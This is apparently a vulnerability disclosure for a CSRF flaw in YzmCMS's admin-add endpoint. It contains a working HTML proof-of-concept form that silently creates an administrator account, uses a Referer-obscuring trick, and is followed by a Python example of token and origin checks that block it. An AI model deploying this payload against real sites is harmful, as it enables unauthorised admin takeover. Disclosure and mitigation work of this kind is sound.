yzmcms_csrf_vulnerability_add_admin

There are two CSRF vulnerabilities that can be used to add an administrator account. The PoC below targets the admin_manage/add action, which accepts the POST without any anti-CSRF token or origin check.

While the administrator is logged in, have them open the following page. The form is submitted from the administrator's browser, so the session cookie is attached automatically and the new account is created.

POC:

<html>
  <body>
    <!-- Rewrite the page path to "/" so the Referer (if sent) does not reveal the attack page's path -->
    <script>history.pushState('', '', '/')</script>
    <!-- Target: the admin-add action. Replace YOUR HOST with the vulnerable site's host. -->
    <form action="http://YOUR HOST/index.php/admin/admin_manage/add.html" method="POST">
      <input type="hidden" name="adminname" value="hack" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
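The check the admin_manage/add action is missing, as an added example. This is not YzmCMS code (YzmCMS is PHP; the example is Python so it can be run stand-alone): a per-session synchronizer token compared in constant time, combined with an Origin/Referer check. The site origin `http://cms.example`, the attacker origin `http://attacker.example` and the form field name `csrf_token` are assumptions. Note that the PoC's `history.pushState('', '', '/')` only rewrites the path, not the scheme or host, so a Referer sent by the attacker page still names the attacker's origin and is rejected; a page that suppresses Referer entirely (Referrer-Policy: no-referrer) is rejected because neither header is present.

```python
"""Server-side CSRF checks for a state-changing endpoint such as
admin_manage/add. Added example, not YzmCMS code; the host names and
the `csrf_token` field name are assumptions."""
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the origin the admin panel is served from.
SITE_ORIGIN = "http://cms.example"


def issue_csrf_token(session):
    """Store a fresh per-session token; the server embeds it in its own forms."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _header(headers, name):
    """Case-insensitive header lookup over a plain dict of request headers."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _origin_of(url):
    """scheme://host[:port] of a URL, or None if it has no scheme/host."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def same_origin(headers):
    """True only when Origin (or, failing that, Referer) names our own origin.
    A request carrying neither header is rejected: browsers add Origin to
    cross-site form POSTs, and an attacker page can suppress Referer."""
    origin = _header(headers, "Origin")
    if origin is not None:
        return origin.lower() == SITE_ORIGIN.lower()
    referer = _header(headers, "Referer")
    if referer is not None:
        return _origin_of(referer) == SITE_ORIGIN.lower()
    return False


def token_matches(session, form):
    """Constant-time comparison of the submitted token with the session's."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def csrf_request_allowed(session, headers, form):
    """Both checks must pass before the admin-add action is executed."""
    return same_origin(headers) and token_matches(session, form)


if __name__ == "__main__":
    # Constructed request matching the PoC form: no token, cross-site origin.
    victim_session = {}
    token = issue_csrf_token(victim_session)
    poc_form = {"adminname": "hack", "password": "123456", "password2": "123456",
                "email": "", "realname": "", "roleid": "1", "dosubmit": "1"}
    print("PoC allowed:", csrf_request_allowed(
        victim_session, {"Origin": "http://attacker.example"}, poc_form))
    print("Legitimate allowed:", csrf_request_allowed(
        victim_session, {"Origin": SITE_ORIGIN}, dict(poc_form, csrf_token=token)))
```

The Origin/Referer check alone is not sufficient (a missing or `null` Origin has to be treated as cross-site, which some legitimate clients trip over), and the token alone is what most frameworks rely on; using both is defence in depth, and the token must be bound to the session rather than sent as a static value.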
